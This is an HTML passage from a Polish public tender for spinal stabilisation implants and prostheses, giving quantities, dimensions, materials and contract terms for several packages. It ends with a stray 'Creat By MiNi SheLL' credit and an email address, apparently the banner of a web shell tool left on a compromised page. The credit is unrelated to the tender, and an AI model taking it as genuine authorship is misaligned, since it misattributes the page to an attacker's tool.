<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kompletów 35 +7 wg prawa opcji (dodatkowa do gwarantowanej, fakultatywna) Implant do mocowania między wyrostkami kolczystymi kręgów. Komplet stanowi wyprofilowany korpus, którego główny blok współpracuje z elastyczną taśmą poliestrową oraz klips zaciskający taśmę. Typoszereg rozmiarowy korpusu: 8, 10, 12, 14, 16 mm. Implant posiadający ramiona stałe oraz ruchome, które po rozłożeniu tworzą tzw. (kołyskę), obejmując wyrostek kolczysty. Dostęp jednostronny, przy zachowaniu więzadła nadkolcowego. 

Komplet: 1 korpus z polimeru PEEK, 1 taśma poliestrowa, 1 tytanowy klips zabezpieczający.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2
STABILIZACJA SZCZYTOWO - POTYLICZNA - MATERIAŁ: TYTAN..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kompletów 3 + 1 komplet wg prawa opcji (dodatkowa do gwarantowanej, fakultatywna) Mocowanie w potylicy oraz w masywach bocznych kręgosłupa szyjnego za pomocą specjalnych kotwic (3 długości wymiarowe), haków szyjnych lub śrub szyjnych wieloosiowych. Haki dostosowane do odcinka C1-C2 oraz C3-C7, możliwość zastosowania haków potylicznych i podpotylicznych. Osadzanie pręta od góry, blokowanie prętów w kotwicach, hakach i śrubach wieloosiowych za pomocą jednego elementu mocującego. Pręty dopasowane anatomicznie do pogranicza potyliczno-szyjnego o długościach w odcinku szyjnym od 50 do 160 ze skokiem co 10 mm, a w odcinku potylicznym od 30-40 mm ze skokiem co 5 mm (w zestawie dostępne pręty do odcinka szyjnego). Łączniki poprzeczne w zakresie długości 35-65 mm stopniowane co 5 mm, składające się z pręta poprzecznego oraz dwóch zaczepów hakowych.

Komplet: 2 elementy do odcinka potylicznego (kotwice-haki) i 4 elementy do odcinka szyjnego (kotwice-haki-śruby wieloosiowe), 2 pręty potyliczno-kręgosłupowe, 1 łącznik poprzeczny.  
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 1 szt. kompletu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.
STABILIZACJA MIĘDZYTRZONOWA ODCINKA SZYJNEGO - MATERIAŁ: PEEK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kompletów 35 + 7 wg prawa opcji (dodatkowa do gwarantowanej, fakultatywna)   Wsuwana proteza dysku szyjnego. Dostosowana do anatomii i fizjologii odcinka szyjnego kręgosłupa. Kształt odzwierciedlający obrys trzonu. Proteza posiadająca karbowane płaszczyzny górne i dolne stykające się z trzonami, zabezpieczające przed przesuwaniem i dyslokacją, dodatkowo wyposażone w 4 (kolce) tytanowe, pełniące jednocześnie rolę znaczników-markerów radiologicznych, zapewniające dodatkowe zakotwiczenie w blaszkach granicznych trzonów. Protezy w kilku rodzajach wykonania obejmując w danym rodzaju pełny typoszereg wymiarowy od 4 do 10 mm. Dyski dostępne z prostymi płaszczyznami, jednostronnie wypukłe, obustronnie wypukłe/klinowe. Proteza musi umożliwiać połączenie z płytką szyjną za pomocą szybkozłącza śrubowego. 
Komplet: 1 klatka na operowany poziom.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4
STABILIZACJA TRANSPEDIKULARNA KRÓTKOODCINKOWA ODCINKA PIERSIOWO-LĘDŹWIOWEGO - MATERIAŁ: TYTAN..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kompletów 15 + 3 wg prawa opcji (dodatkowa do gwarantowanej, fakultatywna)
-śruby transpedikularne z długimi ramionami (w tym repozycyjne) jedno i wieloosiowe cylindryczne z gwintem na całej długości i stożkowym rdzeniem;
-średnice śrub 5.0mm, 6.0mm, 7.0mm; 
-długości 30-65mm ze stopniowaniem co 5mm; 
-średnica łba śruby wraz z blokerem poniżej 12mm;
-wysokość łba śruby wystająca ponad pręt poniżej 5mm;
-jednoelementowy bloker zintegrowany z obejmami zapobiegającymi rozchylaniu się ramion śruby;
-możliwość wprowadzenia pręta w gniazdo śruby bez konieczności dopychania dodatkowym narzędziem;
-pręty osadzane w śrubie wyłącznie od góry (patrząc z punktu widzenia operatora);
-konstrukcja śruby umożliwiająca wprowadzenie i blokowanie wygiętego w płaszczyźnie stabilizacji pręta (do 10o); 
-pręty o średnicy 6.0mm w zakresie długości od 40-460mm ze skokiem co 10mm, posiadające zakończenia sześciokątne umożliwiające derotację śródoperacyjną;
-łącznik poprzeczny w postaci pręcika i dwóch zaczepów hakowych mocowany na prętach, w zakresie długości 35 do 85 mm;
-instrumentarium i implanty umiejscowione na tacach i w kontenerach umożliwiających ich przechowywanie i sterylizację. Taca na implanty wyposażona w specjalną miarkę umożliwiającą szybkie określenie średnicy i długości śrub. 
Komplet: 4 śruby transpedikularne,2 pręty kręgosłupowe, 1 stabilizator poprzeczny.

Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5.
STABILIZACJA ODCINKA SZYJNEGO Z DOSTĘPU PRZEDNIEGO - MATERIAŁ: TYTAN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kompletów 10 + 2 wg prawa opcji (dodatkowa do gwarantowanej, fakultatywna).   Płyty tytanowe do stabilizacji jedno i wielosegmentarnej w zakresie od 20-110mm, ze skokiem co 2,5mm. Płytka dostosowana do anatomii kręgosłupa szyjnego. Śruby z możliwością wielokierunkowego ustawienia w stosunku do płyty. Dwie śruby jednocześnie blokowane z płytką przez obrót tzw. (śmiała) o 90 stopni. Śruby jednokorówkowe i dwukorówkowe, samotnące. Wymagane 3 średnice śrub w zakresie 3,5 - 4,5mm i długości w zakresie 14-20mm, ze skokiem co 2mm. 
Komplet: 1 płytka, 4 śruby.

Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 5 szt. kompletów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6.
PROTEZA TRZONÓW SZYJNEGO ODCINKA KRĘGOSŁUPA -MATERIAŁ: TYTAN - STAŁA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość kompletów 3  +  1 wg prawa opcji (dodatkowa do gwarantowanej, fakultatywna). Implant służący do protezowania trzonów odcinka szyjnego kręgosłupa z dojścia przedniego wykonany ze stopu tytanu. Proteza w postaci perforowanego walca pustego w środku. Proteza w zakresie średnic D10, 12, 14 mm i w zakresie wysokość od 10 do 70 mm ze skokiem co 2,5 mm.
Komplet: 1 proteza trzonu.
Zamawiający wymaga aby Wykonawca przez okres 12 miesięcy zagwarantował zapas konsygnacyjny 2 szt. kompletów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.14.16.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com